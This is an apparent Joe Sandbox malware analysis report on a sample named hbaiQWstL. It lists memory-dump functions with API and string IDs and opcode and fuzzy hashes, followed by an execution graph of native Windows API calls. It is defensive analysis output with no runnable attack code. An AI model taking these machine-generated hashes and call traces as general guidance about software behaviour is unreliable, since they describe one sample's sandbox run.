                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                • API String ID: 3446177414-3154609507
                • Opcode ID: 3646ffb7671c98fcc5f86816578faffcae9bf0ef1a0b3afd88f575ab830d0a3d
                • Instruction ID: b4bf2a009dcd1f77e3b9cc0f852e68da1737b231cba86cda6289eef326c7ec02
                • Opcode Fuzzy Hash: 3646ffb7671c98fcc5f86816578faffcae9bf0ef1a0b3afd88f575ab830d0a3d
                • Instruction Fuzzy Hash: 9841EF32A146559FDB22CF2DD840A26BBE4AFC9B50B0D066DED49DB311E730EA00CBD1
                Function 017DDBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                • API String ID: 3446177414-3526935505
                • Opcode ID: 1fed95dc614ccbf5432a9425f3222b94b86a3612cc75ef8eb581fc0f8a15af4b
                • Instruction ID: e2080f6117b8dec108643d772e13d13f0b82d3c50a1867c85f9513ddeb81ff3f
                • Opcode Fuzzy Hash: 1fed95dc614ccbf5432a9425f3222b94b86a3612cc75ef8eb581fc0f8a15af4b
                • Instruction Fuzzy Hash: 4F3147311447C8DFE736EB6CC419BA6FBE8EF01B10F044498E446C7696C7B8AA84CB11
                Function 017AC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $
                • API String ID: 3446177414-3993045852
                • Opcode ID: 9d0b9ffbaed6a7b5dae1c847017786954e312fded4a1680986c5ac750323a15e
                • Instruction ID: 47620a411aef6c706a08c6221e345b77b4069a4a8534ce5c2e1121cdc5a6a77e
                • Opcode Fuzzy Hash: 9d0b9ffbaed6a7b5dae1c847017786954e312fded4a1680986c5ac750323a15e
                • Instruction Fuzzy Hash: AB112A32904618EBDF16AF98EC486AC7B71FB44764F108219F826A72D0CB756B40CF80
                Function 017DEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6f175ecf2228f08017fa48d6397e32616dff2e6b77d72d40cc56ac6bfae2328a
                • Instruction ID: 36c79bc2acdfd8c35573fe32adf190c9fcb5665f349823ba8c853898038725fd
                • Opcode Fuzzy Hash: 6f175ecf2228f08017fa48d6397e32616dff2e6b77d72d40cc56ac6bfae2328a
                • Instruction Fuzzy Hash: F0E12271D00608DFDB26CFA9C984AADFBF1FF48304F24456AE546A7265DB71A982CF10
                Function 0182EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 0359e2701c4e9904b9d936ba2dd1d555ba79c1bca268c16af0f15819bca80058
                • Instruction ID: fef1b545cde7ab65ab40912655110e535a6760a8dac9cf82bcb320c3e1715950
                • Opcode Fuzzy Hash: 0359e2701c4e9904b9d936ba2dd1d555ba79c1bca268c16af0f15819bca80058
                • Instruction Fuzzy Hash: 7B713871E00629AFDF06CFA8C884ADDBBF5BF48314F54402AEA05EB254D734AA85CF54
                Function 0182F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID:
                • API String ID: 3446177414-0
                • Opcode ID: 8e9ff480cdce5dc12905652c7ed6a6cbee1e68d80e51f26fd66a2bb087387bc2
                • Instruction ID: 3db635b5df23bab39da0d4b6c4c0e0a36fd29bc5eda77d96e50ea5e107841a6a
                • Opcode Fuzzy Hash: 8e9ff480cdce5dc12905652c7ed6a6cbee1e68d80e51f26fd66a2bb087387bc2
                • Instruction Fuzzy Hash: 67512472E002299FDF0ACF98D849ADDBBB1FF49314F14812AEA15E7250D734AA85CF54
                Function 017E7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes$BaseInitThreadThunk
                • String ID:
                • API String ID: 4281723722-0
                • Opcode ID: 45e38e10d7862b7b099e54677c847cf42e32527a0a5b90bb3dceaf7cd8fb6f9f
                • Instruction ID: a341f3c30595a66684798b3facc957a02d3b65cc6684f25ce625471cb51a775f
                • Opcode Fuzzy Hash: 45e38e10d7862b7b099e54677c847cf42e32527a0a5b90bb3dceaf7cd8fb6f9f
                • Instruction Fuzzy Hash: D0312775E00629AFDF22DFA8D844AADBBF0BB48720F24412AE512F7294D7345E40CF64
                Function 017B59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 2397490a1379acb7c4ef53b322dbb9af34e3b1f18339eec1a2156d57138aa008
                • Instruction ID: c3ae743da83299f093d3ae4716b8e81c0e4bafb019bf21dea4b0f516f3503cb7
                • Opcode Fuzzy Hash: 2397490a1379acb7c4ef53b322dbb9af34e3b1f18339eec1a2156d57138aa008
                • Instruction Fuzzy Hash: 04324871D0426ADFDB26DF68C884BEDFBB5BB18304F0081E9E549A7241D7749A84CF91
                Function 017F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                • Instruction ID: 562715d85ac5699b53b40035b55df5ad4c5fda1ab5b675ac0e85313eb4dcae7a
                • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                • Instruction Fuzzy Hash: D5919171E0020A9AEB28DF6DC881ABFFBE5AF44320F54461EEB65E73C4D73099428751
                Function 017CD02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: Bl$l
                • API String ID: 3446177414-208461968
                • Opcode ID: a6b0afd25b13d9a80e9b9b1248db970b76cd7aec3148608e4a8d0e1488e95d05
                • Instruction ID: 6eba8fbbe5d1d1aef72d96d496ea4cf7b7acc10f49e728c737ab6e102f8a1ebf
                • Opcode Fuzzy Hash: a6b0afd25b13d9a80e9b9b1248db970b76cd7aec3148608e4a8d0e1488e95d05
                • Instruction Fuzzy Hash: E0A1C531A00319DBEB31DB98C894BAAF7B5BB44B04F0540FDD909A7245DB74AE85CF91
                Function 017F5DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                Download Yara Rule
                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 017F5E34
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: eefde04eeb2ee4b7bde99f48d26f99f867ec1b14e21a12342dfef7bdf5a4474d
                • Instruction ID: 04251001989a726659648199eed39d7281b497d777eb0c8a148d7f8d86487591
                • Opcode Fuzzy Hash: eefde04eeb2ee4b7bde99f48d26f99f867ec1b14e21a12342dfef7bdf5a4474d
                • Instruction Fuzzy Hash: 5251497191820697E7127A2CC90536FFFD4EB40710F24C99CE7D58B39DEB7484958B46
                Function 017E4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID: 0$Flst
                • API String ID: 0-758220159
                • Opcode ID: 35807502228855cecbaf48c2cf69d69c25eb6acad6a909dbca56a37fd103ed48
                • Instruction ID: 05df29bf065aeab311ff3ae0edb10a90414fa5cef7ee3b95c8f8f144728ba3be
                • Opcode Fuzzy Hash: 35807502228855cecbaf48c2cf69d69c25eb6acad6a909dbca56a37fd103ed48
                • Instruction Fuzzy Hash: 30519DB1E00218CBDF26CF99C588669FBF5FF48318F14806AD64ADB251E7759981CB80
                Function 017DD7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                Download Yara Rule
                APIs
                • RtlDebugPrintTimes.NTDLL ref: 017DD959
                  • Part of subcall function 017B4859: RtlDebugPrintTimes.NTDLL ref: 017B48F7
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $$$
                • API String ID: 3446177414-233714265
                • Opcode ID: 426d154bf97ae2beb9259b0c310ca53e39c029ea2bb29229f967697834f92340
                • Instruction ID: 015771cc084150e9f1268b046e4b90fe1611c92185216a99dc5026c1e76c3178
                • Opcode Fuzzy Hash: 426d154bf97ae2beb9259b0c310ca53e39c029ea2bb29229f967697834f92340
                • Instruction Fuzzy Hash: 2951EF71E4434A9FEB31DFA8C48979DFBB2BB48304F644069C505AB289D775AA85CF80
                Function 0183CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                Download Yara Rule
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0183CFBD
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 3a765c24ea19eb0a14f66c99adfd13c0b8376f8e2ca93250bfc0a5e20d586818
                • Instruction ID: 4fcb83047f21abfeba61e502f124767de895708e1b0e428d15c849466450eb25
                • Opcode Fuzzy Hash: 3a765c24ea19eb0a14f66c99adfd13c0b8376f8e2ca93250bfc0a5e20d586818
                • Instruction Fuzzy Hash: A141B371900215DFDB219F99C844AAEFBB8FF94B40F54412EE914DB354D774DA01CB91
                Function 0182FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $
                • API String ID: 3446177414-3993045852
                • Opcode ID: c7bc1b42a63e77438bda4c4215b04ca135a552882c8eda90d47e03185496087f
                • Instruction ID: 6d4afaabdc52aef4b5851205882aa9917d683c9620c41de0f193366f4ecd580d
                • Opcode Fuzzy Hash: c7bc1b42a63e77438bda4c4215b04ca135a552882c8eda90d47e03185496087f
                • Instruction Fuzzy Hash: B6417179A00219ABDF12DF9DD880AEEBBB5FF48704F140119EE04AB341D7719E55CB90
                Function 017ADF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: 0$0
                • API String ID: 3446177414-203156872
                • Opcode ID: dac536ea437acfe71766e0b37f4d7dc3f43fa05ba0db60e91c01c5e9a30459ab
                • Instruction ID: b0281fb03a482adf9e28d842b2db172a39f52fce659a11ed41f6fff5c62e4fee
                • Opcode Fuzzy Hash: dac536ea437acfe71766e0b37f4d7dc3f43fa05ba0db60e91c01c5e9a30459ab
                • Instruction Fuzzy Hash: 1A416BB16087069FD311CF68C884A57BBE4BB88318F444A6EF988DB341D771EA05CB96

                Execution Graph

                Execution Coverage:2.6%
                Dynamic/Decrypted Code Coverage:4.1%
                Signature Coverage:1.5%
                Total number of Nodes:461
                Total number of Limit Nodes:74
                execution_graph 98512 d058d0 98513 d05934 98512->98513 98514 d0596b 98513->98514 98517 d010e0 98513->98517 98516 d0594d 98519 d01106 98517->98519 98518 d011e1 98518->98516 98519->98518 98520 d01270 98519->98520 98521 d01285 98519->98521 98522 d092d0 NtClose 98520->98522 98529 d092d0 98521->98529 98524 d01279 98522->98524 98524->98516 98525 d012c5 98525->98516 98526 d0128e 98526->98525 98532 d0b370 98526->98532 98530 d092ea 98529->98530 98531 d092fb NtClose 98530->98531 98531->98526 98535 d09630 98532->98535 98534 d012b9 98534->98516 98536 d0964a 98535->98536 98537 d0965b RtlFreeHeap 98536->98537 98537->98534 98538 d08fd0 98539 d09087 98538->98539 98541 d08fff 98538->98541 98540 d0909d NtCreateFile 98539->98540 98547 d0c590 98548 d0b370 RtlFreeHeap 98547->98548 98549 d0c5a5 98548->98549 98550 cf9b47 98551 cf9b5e 98550->98551 98553 cf9b63 98550->98553 98552 cf9b98 98553->98552 98554 d0b370 RtlFreeHeap 98553->98554 98554->98552 98557 ce9c00 98559 ce9fe7 98557->98559 98558 cea3cc 98559->98558 98561 d0afd0 98559->98561 98562 d0aff6 98561->98562 98567 ce4200 98562->98567 98564 d0b002 98566 d0b03b 98564->98566 98570 d05540 98564->98570 98566->98558 98574 cf3130 98567->98574 98569 ce420d 98569->98564 98571 d055a2 98570->98571 98573 d055af 98571->98573 98592 cf1920 98571->98592 98573->98566 98575 cf314d 98574->98575 98577 cf3166 98575->98577 98578 d09d10 98575->98578 98577->98569 98580 d09d2a 98578->98580 98579 d09d59 98579->98577 98580->98579 98585 d08900 98580->98585 98583 d0b370 RtlFreeHeap 98584 d09dcc 98583->98584 98584->98577 98586 d0891d 98585->98586 98589 36a2c0a 98586->98589 98587 d08949 98587->98583 98590 36a2c1f LdrInitializeThunk 98589->98590 98591 36a2c11 98589->98591 98590->98587 98591->98587 98593 cf195b 98592->98593 98608 cf7dd0 98593->98608 98595 cf1963 98596 cf1c30 98595->98596 98619 d0b450 98595->98619 98596->98573 98598 cf1979 98599 d0b450 RtlAllocateHeap 98598->98599 98600 cf198a 98599->98600 98601 d0b450 RtlAllocateHeap 98600->98601 98602 cf1998 98601->98602 98605 cf1a2c 98602->98605 98630 cf6930 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98602->98630 98622 cf4470 98605->98622 98606 cf1be2 98626 d07e80 98606->98626 98609 cf7dfc 98608->98609 98631 cf7cc0 98609->98631 98612 cf7e29 98614 d092d0 NtClose 